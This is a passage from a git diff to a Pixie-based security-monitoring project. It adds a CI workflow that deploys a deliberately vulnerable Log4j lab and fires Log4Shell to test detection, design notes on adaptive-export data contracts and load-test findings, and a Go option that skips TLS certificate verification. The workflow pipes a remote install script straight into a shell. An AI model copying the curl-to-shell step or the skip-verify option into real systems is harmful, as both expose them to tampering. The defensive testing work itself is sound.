diff --git a/.arclint b/.arclint index 7b87106fe80..ee012631a12 100644 --- a/.arclint +++ b/.arclint @@ -20,6 +20,7 @@ "(^private\/credentials\/.*\\.yaml)", "(^src/operator/client/versioned/)", "(^src/operator/apis/px.dev/v1alpha1/zz_generated.deepcopy.go)", + "(^src/e2e_test/adaptive_export_loadtest/tools/loadgen/)", "(^src/stirling/bpf_tools/bcc_bpf/system-headers)", "(^src/stirling/mysql/testing/.*\\.json$)", "(^src/stirling/obj_tools/testdata/go/test_go_binary.go)", diff --git a/.bazelignore b/.bazelignore index d7d6c7da417..70c353d41bc 100644 --- a/.bazelignore +++ b/.bazelignore @@ -6,3 +6,7 @@ third_party/threadstacks tools/chef/nodes # To keep third party dependencies separate, privy is intentional setup as a separate bazel workspace src/datagen/pii/privy + +# adaptive_export_loadtest generator is a docker-built test tool (see its README); +# build-agent to replace with a bazel target. Until then, keep it out of gazelle. +src/e2e_test/adaptive_export_loadtest/tools/loadgen diff --git a/.github/workflows/e2e_log4shell_soc.yaml b/.github/workflows/e2e_log4shell_soc.yaml new file mode 100644 index 00000000000..23982aa087f --- /dev/null +++ b/.github/workflows/e2e_log4shell_soc.yaml @@ -0,0 +1,128 @@ +--- +# e2e-log4shell-soc — stand up a real SOC stack on k3s, fire log4shell end-to-end, +# assert every canonical harness script actually runs, and profile dx in real life. +# +# Heavy: needs eBPF (Pixie PEM) + 16cpu/64gb → the oracle self-hosted runner, NOT +# ubuntu-latest. Deploy mirrors the sovereignsocdemo lab recipe (k8sstormcenter/soc +# make targets) — that kit is makefile-agent's; keep the deploy block in sync with it. +# +# Uses EXISTING k8sstormcenter/pixie repo secrets (no new ones): PX_DEPLOY_KEY, +# PX_API_KEY (Pixie enroll), DX_ENTLEIN_PAT (private entlein/dx image pull), +# CLICKHOUSE_*_PASSWORD, TAILSCALE_AUTH_KEY. Manual by default (it provisions a +# whole cluster); flip the schedule on once it's green. +name: e2e-log4shell-soc +on: + workflow_dispatch: + inputs: + dx_image: + description: dx-daemon image to test (default = .image-tags pin) + required: false + default: "" + soc_ref: + description: k8sstormcenter/soc branch + required: false + default: "218-clickhouse-schema" +permissions: + contents: read + +jobs: + e2e: + runs-on: oracle-vm-16cpu-64gb-x86-64 # eBPF + 16cpu/64gb; ubuntu-latest cannot run Pixie + timeout-minutes: 90 + env: + KUBECONFIG: /etc/rancher/k3s/k3s.yaml + HARNESS: src/e2e_test/adaptive_export_loadtest/harness + steps: + - name: Checkout pixie (harness scripts) + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + + - name: Install k3s + run: | + curl -sfL https://get.k3s.io | sh -s - --write-kubeconfig-mode 644 + for i in $(seq 1 60); do kubectl get nodes --no-headers 2>/dev/null | grep -q ' Ready' && break; sleep 5; done + kubectl get nodes + + - name: Deploy the SOC stack (Pixie + kubescape + ClickHouse + AE + dx + log4j chain) + env: + PX_CLOUD_ADDR: pixie.austrianopencloudcommunity.org + PX_DEPLOY_KEY: ${{ secrets.PX_DEPLOY_KEY }} + PX_API_KEY: ${{ secrets.PX_API_KEY }} + TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }} + DX_ENTLEIN_PAT: ${{ secrets.DX_ENTLEIN_PAT }} # private entlein/dx image pull + CLICKHOUSE_ANALYST_PASSWORD: ${{ secrets.CLICKHOUSE_ANALYST_PASSWORD }} + CLICKHOUSE_INGEST_PASSWORD: ${{ secrets.CLICKHOUSE_INGEST_PASSWORD }} + CLICKHOUSE_PIXIE_PASSWORD: ${{ secrets.CLICKHOUSE_PIXIE_PASSWORD }} + run: | + set -euo pipefail + sudo apt-get update -qq && sudo apt-get install -y python3-yaml + git clone --depth 1 -b "${{ inputs.soc_ref }}" https://github.com/k8sstormcenter/soc soc + cd soc + make pixie # vizier + AE + make kubescape || true # node-agent (netStreaming) + bash tree/clickhouse-lab/install.sh # forensic_db + make log4j # vulnerable backend + attacker + dx + SBoBs (managed-by=User) + if [ -n "${{ inputs.dx_image }}" ]; then + kubectl -n honey set image ds/dx-daemon dx-daemon="${{ inputs.dx_image }}" || true + fi + # optimal config + enable pprof for the real-life profile (DX_TELEMETRY_CACHE/DX_BENCH + # are defaults in main, set here too in case the kit's manifest predates them) + kubectl -n honey set env ds/dx-daemon DX_PPROF_ADDR=0.0.0.0:6060 DX_TELEMETRY_CACHE=1 DX_BENCH=pemdirect + kubectl -n honey rollout status ds/dx-daemon --timeout=120s + + - name: Wait for stack healthy + run: | + set -euo pipefail + kubectl wait --for=condition=Ready pod -l name=adaptive-export -n pl --timeout=300s + kubectl wait --for=condition=Ready pod -l app=dx-daemon -n honey --timeout=300s + kubectl -n pl get pods; kubectl -n honey get pods; kubectl -n log4j-poc get pods + # dx must be non-blind on pemdirect (the optimal default from #29/#33) + kubectl -n honey logs ds/dx-daemon | grep -E "bench=pemdirect|telemetry cache ENABLED" | head + + - name: Run canonical harness scripts — assert each actually runs + run: | + set -uo pipefail + mkdir -p /tmp/evidence; fail=0 + for s in log4shell_fire exp_matrix nfr exp_row_reconcile; do + echo "::group::$s" + if bash "$HARNESS/$s.sh" > "/tmp/evidence/$s.log" 2>&1; then + echo "PASS $s"; tail -5 "/tmp/evidence/$s.log" + else + echo "FAIL $s (exit $?)"; tail -30 "/tmp/evidence/$s.log"; fail=1 + fi + echo "::endgroup::" + done + # detection gate: dx must rule in the log4shell chain (not just run the script) + kubectl -n honey logs ds/dx-daemon | grep -iE "RULE IN|ruled_in" | tee /tmp/evidence/dx_ruleins.txt + if ! grep -qiE "log4shell|control-plane-credential-abuse|RULE IN" \ + /tmp/evidence/dx_ruleins.txt; then + echo "NO dx rule-in — detection failed"; fail=1 + fi + exit $fail + + - name: Profile dx in real life (pprof + metrics) + if: always() + run: | + set -uo pipefail + POD=$(kubectl -n honey get pod -l app=dx-daemon -o jsonpath='{.items[0].metadata.name}') + kubectl -n honey port-forward "$POD" 6060:6060 9095:9095 & PF=$!; sleep 5 + # 30s CPU profile under a fresh fire + heap, served by DX_PPROF_ADDR=:6060 + ( bash "$HARNESS/log4shell_fire.sh" >/dev/null 2>&1 || true ) & + curl -s --max-time 40 -o /tmp/evidence/dx_cpu.pprof \ + "http://127.0.0.1:6060/debug/pprof/profile?seconds=30" || true + curl -s "http://127.0.0.1:6060/debug/pprof/heap" -o /tmp/evidence/dx_heap.pprof || true + curl -s "http://127.0.0.1:9095/metrics" -o /tmp/evidence/dx_metrics.txt || true + go tool pprof -top -nodecount=25 /tmp/evidence/dx_cpu.pprof > /tmp/evidence/dx_cpu_top.txt 2>&1 || true + kill $PF 2>/dev/null || true + echo "=== dx CPU top ==="; head -30 /tmp/evidence/dx_cpu_top.txt + echo "=== verdict latency ===" + grep -E \ + "dx_(time_to_verdict|bench_query_duration)_seconds_(sum|count)" \ + /tmp/evidence/dx_metrics.txt || true + + - name: Upload evidence + profiles + if: always() + uses: actions/upload-artifact@b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882 # v4.4.3 + with: + name: e2e-log4shell-evidence + path: /tmp/evidence/ + retention-days: 14 diff --git a/.github/workflows/vizier_release.yaml b/.github/workflows/vizier_release.yaml index 1241318085f..ce4f18035e5 100644 --- a/.github/workflows/vizier_release.yaml +++ b/.github/workflows/vizier_release.yaml @@ -140,7 +140,7 @@ jobs: git commit -s -m "Release Helm chart Vizier ${VERSION}" git push origin "gh-pages" update-gh-artifacts-manifest: - runs-on: oracle-8cpu-32gb-x86-64 + runs-on: oracle-vm-16cpu-64gb-x86-64 needs: [get-dev-image, create-github-release] container: image: ${{ needs.get-dev-image.outputs.image-with-tag }} diff --git a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml index 5d091f2c989..19f52a640f3 100644 --- a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml +++ b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml @@ -31,6 +31,17 @@ spec: containers: - name: adaptive-export image: vizier-adaptive_export_image:latest + # Bounded so AE can never memory-pressure a node (measured: AE uses + # only ~16-38Mi steady; passthrough with the raised 1M-row cap can + # spike, so 1Gi caps the worst case). CPU was pinned at the old 300m + # limit under concurrent passthrough → raised to 1 core. + resources: + requests: + cpu: 200m + memory: 128Mi + limits: + cpu: "1" + memory: 1Gi env: - name: PL_NAMESPACE valueFrom: diff --git a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml index beced120f63..9250676dca4 100644 --- a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml +++ b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml @@ -1,3 +1,10 @@ +# SEED-ONLY template — NOT in kustomization.yaml (separation of concerns). +# Real credentials are written by `make ae-auth` (pixie-api-key from keys.env, +# clickhouse-dsn = the fixed forensic-CH constant). Do NOT add this back to the +# bundle: a re-apply would clobber the real pixie-api-key with the placeholder +# (the recurring "AE unauthenticated / writes 0" bug). Apply this by hand ONLY +# to seed a brand-new cluster so the AE pod's secretKeyRef resolves before +# ae-auth runs. --- apiVersion: v1 kind: Secret diff --git a/k8s/vizier/bootstrap/kustomization.yaml b/k8s/vizier/bootstrap/kustomization.yaml index e373c6bbfe3..e2afd14af16 100644 --- a/k8s/vizier/bootstrap/kustomization.yaml +++ b/k8s/vizier/bootstrap/kustomization.yaml @@ -16,5 +16,10 @@ resources: - cert_provisioner_job.yaml - vizier_crd_role.yaml - adaptive_export_role.yaml -- adaptive_export_secrets.yaml +# adaptive_export_secrets.yaml is intentionally NOT bundled here: it holds real +# credentials (pixie-api-key, clickhouse-dsn) owned by `make ae-auth`. Bundling +# it meant every infra re-apply clobbered the real key with the placeholder. +# Separation of concerns: infra (role+deployment) re-appliable; secret is +# created ONCE by ae-auth and never touched by this kustomization. ponytail: +# apply adaptive_export_secrets.yaml manually only to seed a fresh cluster. - adaptive_export_deployment.yaml diff --git a/skaffold/skaffold_vizier.yaml b/skaffold/skaffold_vizier.yaml index f8370a1f7e1..58b6bba70af 100644 --- a/skaffold/skaffold_vizier.yaml +++ b/skaffold/skaffold_vizier.yaml @@ -36,8 +36,8 @@ build: bazel: target: //src/vizier/services/cloud_connector:cloud_connector_server_image.tar args: - - --config=x86_64_sysroot - - --compilation_mode=opt + - --config=x86_64_sysroot + - --compilation_mode=opt - image: vizier-cert_provisioner_image context: . bazel: diff --git a/src/api/go/pxapi/opts.go b/src/api/go/pxapi/opts.go index 7de095a7f1a..0e2948f999c 100644 --- a/src/api/go/pxapi/opts.go +++ b/src/api/go/pxapi/opts.go @@ -82,3 +82,17 @@ func WithDirectCredsInsecure() ClientOption { c.insecureDirect = true } } + +// WithDirectTLSSkipVerify is the secure-by-default option for direct (standalone / +// node-local PEM) connections: the transport IS TLS-encrypted, but the server cert +// is not chain/hostname-verified. Use this instead of WithDirectCredsInsecure when +// the direct endpoint serves TLS with a self-signed / service cert whose SAN does +// not match the node IP (e.g. vizier-pem's direct-query port served with +// service-tls-certs, dialed at HOST_IP). Unlike WithDisableTLSVerification it does +// NOT require a "cluster.local" address, so it works for the node-IP direct dial. +// Bearer creds (the minted JWT) therefore ride an encrypted channel, never plaintext. +func WithDirectTLSSkipVerify() ClientOption { + return func(c *Client) { + c.disableTLSVerification = true + } +} diff --git a/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md b/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md new file mode 100644 index 00000000000..f848d63e149 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md @@ -0,0 +1,98 @@ +# Adaptive Export (AE) — implied contracts + +What AE *currently assumes but does not enforce*. Each ⚠️ is an **implied** contract +(a silent assumption); 🔴 marks ones we've observed violated, with the fix. Grounded +in `src/vizier/services/adaptive_export/` (trigger, controller, sink, config) + the +`forensic_db` DDL. + +## End-to-end data flow + where each contract sits + +```mermaid +flowchart TD + subgraph PROD["Producer (per node)"] + VEC["Vector kubescape_enrich sink
(or load-test fixtures)"] + end + subgraph CH1["ClickHouse — input"] + KL["forensic_db.kubescape_logs
MergeTree ORDER BY (event_time, hostname)
TTL toDateTime(event_time)+30d"] + end + subgraph AE["adaptive_export (per node DaemonSet)"] + TRG["TRIGGER: poll 250ms
WHERE hostname=NODE AND event_time>=watermark
ORDER BY event_time LIMIT N"] + CTL["CONTROLLER: hash + active-set
window [event_time-Before, now)"] + PXL["DATA-PLANE: PxL per (ns,pod)×table
refresh every 30s while window open"] + end + subgraph VZ["Pixie"] + QB["vizier-query-broker → PEMs"] + end + subgraph CH2["ClickHouse — output (forensic_db)"] + ATTR["adaptive_attribution
ReplacingMergeTree(t_end)
ORDER BY (hostname, anomaly_hash)"] + WM["trigger_watermark
ReplacingMergeTree(updated_at)"] + PROT["http/dns/pgsql/conn_stats/...
plain MergeTree (NO dedup)"] + end + + VEC -->|"C1 ⚠️ event_time UNIT = seconds
C2 ⚠️ hostname = k8s node name"| KL + KL -->|"C3 🔴 event_time monotone ≥ watermark
C4 ⚠️ boundary dedup by content fp"| TRG + TRG --> CTL + CTL -->|"C5 ⚠️ anomaly_hash = f(pid,comm,pod,ns) only"| ATTR + TRG -->|"C6 ⚠️ watermark persist throttled ~5s"| WM + CTL --> PXL + PXL -->|"C7 needs registered vizier"| QB + QB -->|"C8 🔴 plain MergeTree + 30s re-pull → dup"| PROT + PXL -->|"C9 ⚠️ write only if rows>0"| PROT + ATTR -. "C10 ⚠️ join: events.pod = ns/pod ↔ attribution.pod = bare" .- PROT +``` + +## Boot / dependency contract + +```mermaid +flowchart LR + ENV["ENV (all non-empty or FATAL):
PIXIE_CLUSTER_ID · CLUSTER_NAME
PIXIE_API_KEY · CLICKHOUSE_DSN"] --> BOOT + CM["cm/pl-cloud-config
PL_CLOUD_ADDR=…:443"] -->|"C11 🔴 missing :443 → crashloop"| BOOT + BOOT["AE boot"] --> DDL["C12 self-applies forensic_db DDL
(ADAPTIVE_SKIP_APPLY=false)"] + BOOT --> CTRLPLANE["control plane: CH only"] + BOOT --> DATAPLANE["data plane: needs query-broker
(C7) + ADAPTIVE_PUSH_PIXIE_ROWS"] +``` + +## Contract register + +| # | Contract (implied) | Enforced? | Status / fix | +|---|---|---|---| +| C1 | `kubescape_logs.event_time` is unix **seconds** (one unit end-to-end) | ❌ trigger auto-detects s/ms/ns; DDL `toDateTime()` assumes seconds | 🔴 **F8 root** — see C3; AE-2 standardize+normalize | +| C2 | `hostname` = the k8s **node** name (AE polls `WHERE hostname=node`) | ❌ convention only | ⚠️ fixtures must use a real node, else no AE ever reads them | +| C3 | every new anomaly's `event_time` ≥ current watermark (monotone) | ❌ strict HWM filter | 🔴 **F8** — a larger-unit / out-of-order / future row poisons the HWM → all later rows silently dropped. **Fix (PR #53):** normalize cursor to nanos (`chNormEventTimeNanos`); AE-9: ingest-order cursor / bounded-lookback+dedup + below-watermark metric | +| C4 | rows sharing `event_time` at the boundary are deduped by content fingerprint | ✅ `seenAtBoundary` | ok | +| C5 | `anomaly_hash = SHA256(pid,comm,pod,ns)[:16]` — identity is the **workload**, independent of event_time/RuleID | ✅ | ok (N events for one target → 1 attribution row) | +| C6 | `trigger_watermark` persisted value tracks the live cursor | ❌ throttled ~5s | ⚠️ external readers/restart see up to 5s stale; AE-7 flush-on-shutdown | +| C7 | data-plane requires a **registered** vizier query-broker | ❌ | ⚠️ control plane works without it; data plane silently does nothing | +| C8 | re-pulling a window is idempotent | ❌ protocol tables plain MergeTree (no dedup) + 30s re-pull | 🔴 duplicate inflation. **Fix:** single-shot (`ADAPTIVE_PUSH_REFRESH_SEC=-1`, or `AFTER>Pixie: PxL per table for (ns,pod), slice since last_upper + Pixie-->>AE: rows + AE->>CH: write rows (write ⊇ DX read, C14) + end + DX->>AE: StartExport / StopExport / extend t_end (control surface, CONTROL_ADDR) + Note over AE: stop ONLY on t_end or DX stop — never silently early (C15) +``` + +- **DX controls:** (1) open/extend a window (each referral/anomaly extends `t_end`), (2) explicit **StopExport** via the control surface (`CONTROL_ADDR`, design rev-3 — confirm wired), (3) the active set (which pods AE over-captures). +- **DX relies on:** C5 (stable hash identity), C14 (write ⊇ read), **C15 (no premature stop)**, C9 (0 rows only when the workload is genuinely silent), C10 (the `ns/pod` ↔ bare join). For DX to steer dependably, C3/C8/C13/C15 must move from 🔴 to ✅. + +## Legend +✅ enforced in code · ⚠️ implied (assumed, not checked) · 🔴 observed violated (fix noted). +Full repro + backlog: `FINDINGS_AND_BACKLOG.md`. The fixes for C3/C1 are on PR #53 (`ae-prod`). diff --git a/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md b/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md new file mode 100644 index 00000000000..c385b04a6ec --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md @@ -0,0 +1,170 @@ +# AE load-test — reproducible findings + robustness backlog + +Rig `6a3066767841074cd3200495` (k3s, 2 nodes), AE `vizier-adaptive_export_image:0.14.19-aeprod-clean3`, +control plane against ClickHouse (real kubescape NOT deployed; only `kubescape_logs` fixtures injected). +Every finding below is REPRODUCED with the harness in `aeload/`; numbers are measured, not estimated. + +## Headline + +1. **The "writes stop after initial success, data still on Pixie" bug is REPRODUCED (F8).** AE's trigger + gates on a strict high-water-mark of the kubescape-supplied `event_time`; **any anomaly with + `event_time < watermark` is silently dropped**. A single mixed-unit row (nanos/millis) poisons the + watermark to ~1.78e18 → every subsequent seconds-row is dropped **forever** → AE stops writing + although Pixie still has the data. Reproduced + recovered (reset watermark + restart) on the rig. +2. AE's **control-plane write surface is EXACTLY reproducible** when event_times are monotonic — `71/71` + then `20/20` (E1, seconds-native) std=0. +3. **F1 correction:** production (soc Vector) emits `event_time` in **seconds**, for which the DDL TTL is + correct. My earlier "DDL bug" report was triggered by my fixtures using **nanoseconds**; the real, + durable issue is that the unit is **not standardized/enforced** (trigger auto-detects s/ms/ns; DDL + assumes seconds) — which is also the root enabler of the F8 catastrophe. + +## Reproducible findings + +### F8 — CRITICAL (likely THE production bug): watermark high-water-mark silently drops any `event_time < watermark` +`trigger_watermark` is a monotonic cursor on the kubescape-supplied `event_time` (the trigger SELECT does +`WHERE event_time >= watermark`). It is **content-derived, not ingest-ordered**, so it is fragile to: +1. **Unit heterogeneity (catastrophic):** one anomaly in nanos/millis sets `watermark ≈ 1.78e18`; every + later seconds-row (`~1.78e9`) is `< watermark` → dropped **forever**. The trigger explicitly supports + s/ms/ns, so a mixed pipeline guarantees this. +2. **Clock skew / out-of-order alerts:** a late/earlier-stamped anomaly after a newer one → dropped. +3. **Restart re-scan:** on reboot AE loads the persisted watermark (or re-scans to the max existing row), + so anomalies stamped below that max are never processed. +Effect = "writes succeed initially, then stop, data still on Pixie" (the trigger halts; the data plane +and Pixie are fine). **Reproduced on the rig** (E8 sustained): with the watermark poisoned at a leftover +nanos value (`1781559619170395824`), 25/25 ticks of fresh seconds anomalies → **n_anomalies stayed 0**. +After `ALTER TABLE trigger_watermark DELETE WHERE 1=1` + AE restart, once tick event_times rose above the +re-scanned max, **n_anomalies grew 1→2→3→4, delta=1 per tick** (healthy steady state). Evidence: +`e8_steady.csv` (stalled), `e8_recov.csv` (recovered + steady growth). + +### F1 — `kubescape_logs` TTL/PARTITION assume seconds; non-seconds producers are TTL-deleted (unit not enforced) +**Correction to the earlier report:** production (soc Vector, `to_unix_timestamp(ts)` = VRL **seconds**; +confirmed by the AE code comment "Vector's kubescape sink … writes unix SECONDS ~1.7e9") emits **seconds**, +for which `toDateTime(event_time)` is CORRECT — the DDL is **not** buggy in production. The overflow I first +saw was caused by **my fixtures using nanoseconds** (copied from the Go `integration_test`/`e2e` convention, +which use `UnixNano`). The durable issue: the unit is **unstandardized** — the trigger auto-detects +s/ms/ns but the DDL hardcodes seconds, so a millis/nanos producer has ALL its `kubescape_logs` +TTL-deleted. Original (now-superseded) overflow detail follows for the record: +`event_time` is UInt64 **nanoseconds** (all Go code + every fixture + `integration_test.go` use +`UnixNano`). But the DDL (soc `clickhouse-lab/schema.sql` AND AE's embedded +`internal/clickhouse/schema.sql`) does: +```sql +PARTITION BY toYYYYMM(toDateTime(event_time)) +TTL toDateTime(event_time) + INTERVAL 30 DAY +``` +`toDateTime()` interprets its arg as **seconds**. Reproduced on the rig: +``` +toDateTime(1781559074162913804) = 2106-02-07 (saturates at DateTime max) +toDateTime(1781559074162913804)+30 DAY = 1970-01-30 (OVERFLOWS past max → wraps to 1970) +(... ) < now() = 1 (already_expired) +``` +→ every row is born already-expired → CH TTL-deletes `kubescape_logs` on the next merge. +Measured: after injecting ~20 anomalies, `kubescape_logs` held **2** rows; all showed `expired=1`. +The AE trigger (250 ms poll) races the merge: anomalies polled before deletion get an +`adaptive_attribution` row; the rest are **lost with no error logged** (the ~10% E1 miss). +PARTITION is also broken — every row lands in the single `2106-02` partition. + +**Fix validated on the rig:** +```sql +ALTER TABLE forensic_db.kubescape_logs + MODIFY TTL toDateTime(intDiv(event_time, 1000000000)) + INTERVAL 30 DAY; +``` +→ `ttl_expiry = 2026-07-15`, `expired = 0` → **E1 re-run = 20/20 PASS, std=0** (was ~9/10). + +### F2 — Anomaly loss is silent + unretried +When F1 (or any input-side pruning / transient CH write error) drops an anomaly, AE logs **nothing** +and never retries — `adaptive_attribution` simply lacks the row. There is no `dropped_anomalies` / +`trigger_lag` metric to detect it. Reproduced: rep 8 had 0 attribution, AE log had zero errors/warnings. + +### F3 — POSITIVE: control plane is EXACTLY reproducible when processed +With F1 fixed: `uniqExact(anomaly_hash)` and `adaptive_attribution` FINAL counts are **std=0 / CV=0** +across all reps. Dedup is deterministic (N events for one (pid,comm,pod,ns) → 1 hash → 1 row). +Measured (TTL-fixed): +- **E1** single anomaly = **20/20 EXACT** (uniq=1, attrib=1 every rep) +- **E3** fan-out (8 distinct pods) = **20/20 EXACT** (uniq=8, attrib=8 every rep) +- **E4** boundary collision (2 rows, same `event_time`, different RuleID, same target) = **20/20 EXACT** + (fingerprint-dedup deterministic → 1 hash, 1 row) +- **E2** dedup/extend (10 events, 1 target → 1 row) = **10/10 EXACT** (uniq=1, attrib=1) +- **E6** restart idempotency = **1/1 EXACT** — attribution stayed exactly 1 across an AE rollout-restart + (no double-count on watermark reload) + +**Total: 71/71 control-plane reps EXACT (std=0)** after AE-1. + +### F4 — AE cannot boot for ClickHouse-only / control-plane-only operation +AE fatals at config validation without pixie cluster identity, even when only the CH trigger→attribution +path is needed: +``` +fatal "missing required env variable 'PIXIE_CLUSTER_ID'" then 'CLUSTER_NAME' +``` +Worked around with a dummy `PIXIE_CLUSTER_ID` + `CLUSTER_NAME` + `ADAPTIVE_PUSH_PIXIE_ROWS=false`. +This couples the (CH-only) control plane to a healthy vizier registration that it does not use. + +### F5 — `trigger_watermark` persistence is throttled (~5 s) +The persisted cursor lags the in-memory cursor by up to `ADAPTIVE_WATERMARK_SAVE_SEC` (default 5 s). +Reproduced: queried `watermark` lagged the just-injected `event_time` by one rep repeatedly (the +in-memory cursor + `adaptive_attribution` were already correct). On crash, up to that interval of +progress is lost → reprocessing (dedup-safe, but wasteful + can surprise external observers). + +### F6 — (provisioning / dependability) custom-version vizier never registered +`make pixie` with `VIZIER_VERSION=…-aeprod-clean3` (extract_yaml path) left **`pl-cloud-config`** and +**`pl-cluster-secrets`** uncreated → cert-provisioner crashloops (`pl-cloud-config not found`, +`pl-cluster-secrets does not exist`) → NATS/PEM/query-broker never start → **no data plane**. Hand-created +`pl-cloud-config`; `pl-cluster-secrets` requires cloud registration. This blocks the live **E5 data-plane** +experiments (harness is ready, waiting on a healthy `vizier-query-broker`). + +### F7 — single-pull config confirmed +AE boots with `window_after=5s window_before=2m0s poll_interval=250ms` — `AFTER (5s) < refresh (30s)` +forces exactly one pull per window on the published image (so the non-deduping MergeTree protocol tables +aren't re-inserted). The new `ADAPTIVE_PUSH_REFRESH_SEC=-1` knob (added this branch, uncommitted) is the +explicit equivalent. + +## Backlog — make AE repeatable, robust, dependable + +| ID | Pri | Fix | Why | +|----|-----|-----|-----| +| **AE-9** | **P0** | **Make the trigger cursor robust** — don't gate on the content `event_time` as a strict HWM. Options: (a) cursor on **ingest order** (a monotonic insert id / `_part`+row, or an `inserted_at DEFAULT now64()` column) instead of `event_time`; (b) bounded **lookback window** (re-scan `event_time >= watermark - L`) + **content-dedup** (anomaly fingerprint) so out-of-order/skewed/below-watermark anomalies are still processed exactly once; (c) NORMALIZE `event_time` to one unit before it ever reaches the cursor. Add `dx_anomalies_below_watermark_total` + `trigger_watermark_seconds` metrics + alert. | **F8 — the production "writes stop, data on Pixie" bug.** A single mixed-unit/skewed/out-of-order row poisons the HWM → silent total halt. Highest-impact dependability fix. | +| **AE-2** | **P0** | Standardize `event_time` to ONE documented unit + **normalize-or-reject at ingest** (Vector + AE); remove the trigger's silent s/ms/ns auto-detect (it *enables* F8 + F1). | The unit ambiguity is the root enabler of both F8 (watermark poison) and F1 (TTL delete). | +| **AE-1** | P1 | Make the `kubescape_logs` DDL TTL **and** PARTITION unit-agnostic (e.g. normalize `event_time` in a MATERIALIZED `event_dt DateTime64(9)` used by TTL/PARTITION) so a non-seconds producer isn't silently TTL-deleted. Patch BOTH soc `clickhouse-lab/schema.sql` and AE embedded `internal/clickhouse/schema.sql`. | F1: defense-in-depth — even with AE-2, a stray non-seconds row shouldn't vanish. (Production seconds path is currently correct.) | +| **AE-3** | P1 | Eliminate the retention-vs-trigger race: AE should own `kubescape_logs` deletion (delete only AFTER an anomaly is acked into `adaptive_attribution`), OR decouple trigger progress from row TTL. Add `dx_anomalies_dropped_total` + `trigger_lag_seconds` metrics + alert. | F1/F2: today a pruned-before-polled row is lost invisibly. Observability + ordering guarantee. | +| **AE-4** | P1 | Make `adaptive_attribution` writes durable — retry with backoff, count failures, never silently drop. | F2: best-effort write = unaccounted loss under any CH hiccup. | +| **AE-5** | P1 | Allow CH-only / control-plane boot: make `PIXIE_CLUSTER_ID`/`CLUSTER_NAME`/`PIXIE_API_KEY` optional when `ADAPTIVE_PUSH_PIXIE_ROWS=false` and not streaming/passthrough. | F4: enables AE testing + degraded operation without a healthy vizier. | +| **AE-6** | P2 | Make protocol tables `ReplacingMergeTree` keyed by (hostname,event_time,upid,…) so repeated pulls are idempotent regardless of refresh; keep `ADAPTIVE_PUSH_REFRESH_SEC` (done) for explicit single-shot. | Data-plane robustness: removes the "plain MergeTree + 30s re-pull → duplicate inflation" footgun (the reason single-pull is currently required). | +| **AE-7** | P2 | Flush `trigger_watermark` on shutdown; make the save throttle configurable. | F5: bound crash-reprocessing + give observers a fresh cursor. | +| **AE-8** | P2 | (makefile-agent) `make pixie` for custom `VIZIER_VERSION` must create `pl-cloud-config` and complete cloud registration (`pl-cluster-secrets`). | F6: blocks data-plane e2e + any real deployment of a custom AE build. | + +## Fix implemented + validated (F8 / AE-2 unit-normalization) + +**Code (working tree, `internal/trigger/clickhouse.go`):** the trigger cursor is now **canonical +nanoseconds**. Added `normalizeEventTimeNanos()` (s/ms/ns → ns, same thresholds as +`controller.eventTimeToTime`) + `chNormEventTimeNanos` (the ClickHouse equivalent). The poll SELECT now +filters + orders on `chNormEventTimeNanos >= ` (was raw `event_time >= watermark`); +`maxSeen`, the in-memory watermark, the boundary-dedup compare, and the loaded/persisted watermark are all +normalized. Net: a mixed-unit row can no longer drive the HWM past real rows. Unit test +`clickhouse_internal_test.go` (in-package; runs on a build PG): `TestNormalizeEventTimeNanos` + +`TestFetchSinceFiltersOnNormalizedEventTime`. + +**Empirically validated at the data layer on the rig (no AE rebuild needed)** — against the actual +poisoned watermark `1781559619170395824`: +- OLD raw filter `event_time >= wm` → **0 rows** (AE sees nothing = the bug) +- NEW normalized filter `chNormEventTimeNanos >= wm` → **60 rows** (all recovered) +- table held 60 cplane-01 rows the whole time — the filter was the sole cause. + +**Still to land:** rebuild + deploy the AE image carrying this Go change (can't `git push` per rules → +hand to build-agent / `gh-pixie-build`), then re-run E8 to confirm no-poison live. AE-9 (out-of-order +lookback + below-watermark metric) and AE-1 (unit-agnostic DDL TTL/PARTITION) remain. + +## Reproducibility status + +| Layer / experiment | Status | +|---|---| +| Control plane E1 (single) | ✅ **20/20 EXACT (std=0)** after AE-1 fix | +| Control plane E3 (fan-out) | ✅ **20/20 EXACT** (uniq=8, attrib=8) | +| Control plane E4 (boundary collision) | ✅ **20/20 EXACT** (uniq=1, attrib=1) | +| Control plane E2 (dedup) | ✅ **10/10 EXACT** (uniq=1, attrib=1) | +| Control plane E6 (restart idempotency) | ✅ **1/1 EXACT** (attrib stayed 1 across AE restart) | +| **Control plane total** | ✅ **71/71 reps EXACT (std=0)** + **E1 20/20 seconds-native** | +| E8 sustained same-pod (control) | ✅ reproduces F8 (stall when event_time ≤ watermark) + recovers to steady delta=1 growth | +| Data plane E5 + E8-data | ⛔ blocked on F6 (vizier not registered); data-plane rig requested from makefile-agent; harness ready | +| L1 hermetic (`go test`, exact bytes) | 🧰 authored; runs on a build PG (pixie module compile) | + +NOTE: harness is now **seconds-native** (production unit). The earlier 71/71 used nanos + a compensating +TTL ALTER; E1 was re-confirmed **20/20 std=0 natively with seconds** + the seconds-correct DDL (no ALTER). diff --git a/src/e2e_test/adaptive_export_loadtest/README.md b/src/e2e_test/adaptive_export_loadtest/README.md new file mode 100644 index 00000000000..f0e94a54fdf --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/README.md @@ -0,0 +1,72 @@ +# adaptive_export_loadtest + +Load-test + e2e harness for **adaptive_export (AE)** and the dx-steered SOC chain. +There are exactly **two ways to test**, by design — pick by what you're proving: + +| family | needs a live SOC stack? | proves | entry point | +|---|---|---|---| +| **A. 